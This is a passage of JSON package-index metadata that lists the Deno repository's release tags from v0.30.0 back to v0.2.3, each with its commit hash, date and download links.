github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job